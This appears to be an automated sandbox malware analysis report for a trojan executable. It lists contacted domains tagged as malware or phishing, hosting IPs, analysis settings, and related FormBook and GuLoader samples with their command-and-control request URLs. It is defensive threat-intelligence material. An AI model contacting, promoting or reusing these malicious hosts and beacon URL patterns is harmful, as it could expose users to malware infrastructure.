                                                          http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bondexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.mtauratarnt.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-ifexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.m-baer.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.m-baer.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.m-baer.com/rs10/www.rewmio.xyzexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fhstbanknigeria.com/rs10/www.m-baer.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.rewmio.xyz/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  https://passwordreset.microsexplorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.totalkfood.com/rs10/www.cryptarrow.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://account.activedirectory.explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.hdlive7.liveexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.microexplorer.exe, 00000003.00000002.3797222750.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1327213978.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1326487164.0000000007320000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.guillaumecarreau.com/rs10/www.omarshafie.onlineexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://wns.windows.com/EM0explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.totalkfood.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.guillaumecarreau.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://www.fhstbanknigeria.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.starryallure.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://android.notify.windows.com/iOSdXexplorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.nightoracle.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.starryallure.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-scholaexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.omarshafie.online/rs10/explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://account.liexplorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.starryallure.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.nightoracle.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: phishing
                                                                                          unknown
                                                                                          http://www.cleaning-products-29334.bondReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.roundaboutlogistics.com/rs10/www.nightoracle.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.calm-plants.com/rs10/www.hdlive7.liveexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                103.224.212.212
                                                                                                www.fhstbanknigeria.comAustralia
                                                                                                133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                103.224.212.210
                                                                                                www.nightoracle.comAustralia
                                                                                                133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                35.186.223.180
                                                                                                www.m-baer.comUnited States
                                                                                                15169GOOGLEUSfalse
                                                                                                104.21.69.174
                                                                                                www.mtauratarnt.comUnited States
                                                                                                13335CLOUDFLARENETUStrue
                                                                                                104.247.82.51
                                                                                                www.robertjamesfineclothing.comCanada
                                                                                                206834TEAMINTERNET-CA-ASCAtrue
                                                                                                23.227.38.74
                                                                                                shops.myshopify.comCanada
                                                                                                13335CLOUDFLARENETUStrue
                                                                                                3.33.130.190
                                                                                                totalkfood.comUnited States
                                                                                                8987AMAZONEXPANSIONGBtrue
                                                                                                104.19.157.23
                                                                                                cname.beehiiv.comUnited States
                                                                                                13335CLOUDFLARENETUStrue
                                                                                                Joe Sandbox Version:38.0.0 Ammolite
                                                                                                Analysis ID:1331069
                                                                                                Start date and time:2023-10-24 08:26:10 +02:00
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 11m 35s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:24
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:1
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample file name:GCeHcfCef8.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:841031a37159398b8eebca7bb7eff56b.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.evad.winEXE@8/1@10/8
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 99%
                                                                                                • Number of executed functions: 126
                                                                                                • Number of non-executed functions: 295
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                TimeTypeDescription
                                                                                                08:27:09API Interceptor2x Sleep call for process: GCeHcfCef8.exe modified
                                                                                                08:27:17API Interceptor7634111x Sleep call for process: explorer.exe modified
                                                                                                08:27:56API Interceptor7503728x Sleep call for process: cmmon32.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                103.224.212.212Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
                                                                                                SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
                                                                                                103.224.212.2103Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.amandaastburyillustration.com/4hc5/?5j=tFNxItah5B1Ppp8&1bYL=gSDqYeuNyx9e7kEHeYuvifh3Cjr1gIeW+4DcEpd4uqJRNoyOBBMvPYw4l031L02pmBQlOudiow==
                                                                                                jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • www.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g
                                                                                                DHL-081023.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.joeysdoor.com/hesf/?APG0=swh0B3mpDGfIoIkFkBMBaZWoEXPEWkdnCE+a2KvQ5fM7xuJWfY5mF8tuq1PLwLxVobF5&MPkP=tV98bPH
                                                                                                104.21.69.174Awb_tracking_receipt_0321202291319800000000000000.xlsxGet hashmaliciousFormBookBrowse
                                                                                                • www.48hoursdesigns.com/rzwo/?o6=CYsAWEeEFiYfI/tGu5WSuRheEZ4egY/IEPGJFt7GPAk6UMTjhL8YpIczGI6gkpvA1nGdJg==&e6A=3fsXGhB
                                                                                                UIHyK98B9o.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.48hoursdesigns.com/rzwo/?f4=CYsAWEeBFlYbIvhKs5WSuRheEZ4egY/IEPeZZunHLgk7U9/lmbtU/MkxFu6m8I3I5Ry8Qb6uWA==&7nt8M=f6Al
                                                                                                104.247.82.51jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • www.robertjamesfineclothing.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt
                                                                                                23.227.38.74REF_03351.docGet hashmaliciousFormBookBrowse
                                                                                                • www.euvexofficial.com/o5pf/?tD=9aI1YFFk4DHZUYOkZ3596HCeQC4lBtwqGeE+PDBVT619RxsGxwkZsphZUFBvgGf75d0Fyg==&QJB06r=YJBL_4XhHF
                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.lilypaddesigns.net/ur25/?D6ql=O5zvqhT3r20qcpZxKsthuYcOsFbPQWrLBLvhbAYWoeFV+rVVf8vMu5EyAGvtkqnz/XowCBrz8A==&W0=NBg0uphHLPGDKlyP
                                                                                                PAGO_72094.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.hollamia.com/eg02/?yvF=MJB0J&iHf=Elvx7inJN+0OHz/RIfvhLUl1T5U3GxCk5u99p9BlmIngC2ZyhmNcRuZKuAEWV0qTl4rl
                                                                                                PI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                • www.tuktukwines.com/n7ak/
                                                                                                PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • www.mochibees-wylie.com/ge06/?9r549=hJkx0eH2QAKr/rM6zPsNviUHTBSqNLPfVhgpdMrR1UAGLx2aBw8r3vgSMp7elrAEYXkqhQ==&sDK=XrRD
                                                                                                Quote_Request.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.windbornecreations.com/5nd2/?O2J=AhpvgK6laQupWPxI3k6FuQt8ZuaKJ++nU9Tcv1SxwrOaN/SOaUnkkyNrcVdD5l/OGGvQ&nPqLWL=dXbHpJHPNrxDD
                                                                                                Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.laplumeuniverselle.com/k0p2/?8p44t=MvZszHfg/1YZXhmYIEXfE3E69GxEM6y9HfuQyTdzOeTnlzvVakVLhrynK/afiVLHB4PD&Qds=4hAhHVzPH2uL
                                                                                                Orden_de_compra.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.therealopulent.com/ey16/?RjA=3bcd3Y2FgCYeuy5Q6BY7uUBxxZoK+N98I8Sra2jBULM2pb+N/WFsUij82FsZzWsxf00EstPM0g==&lnrlk=yV4D_pFhK
                                                                                                e-dekont.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • www.brewfitonline.com/dz01/?F6h4=NFNTaLlX&RfgL=pBlov/boaeHRhtLu7qKIGWmw3yivhA7+bl/lYrcgeIWenn1RoEoZOSFjikQK3u+Zz5uw
                                                                                                mDZvZLTjGd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • www.domumix.com/t6tg/?lhrd=NCr4hxu03uvSlYiwMfFe4UNVT4u8oc6t8RHvA0WXya/qusgW/qyO6dtLGnQF1ZmwUWZjoUkHpw==&1bj=3fe8C2hPtRCxtL
                                                                                                WoDN7Q47dO.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.hillstonetrade.com/o6g2/?DR-DOL=ixopsp0&kDKXx0V=0mflL6X/MbesGK2lnwmr8zuwXZV3n2b2TIjYGHzFIr1gp9tnrq5CHen/Y3BBgIIqMoIkpqtURQ==
                                                                                                jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • www.laserhairremovalkit.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn
                                                                                                Vdxer5qjIX.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.familyfarmequipment.com/o6g2/?SBZ=nS9YWzFY3N6syAhbwoNBshoWv9LGSbS8x4bIAiF2evmS+jLDSfz0OyK3yknLqM4fqEnt&0rN8=9rNd98_pMt
                                                                                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • www.modeparisiennefr.com/ge06/?BRr=1PQ6+z1zCuhiDtNSfWRWHzULIaSgIyGLxvhKDe40IO1yU7fcEEkK65M/Vi7JoYmvOisiHg==&3f=-ZoLnTC
                                                                                                4XiBSHVMK9.exeGet hashmaliciousFormBookBrowse
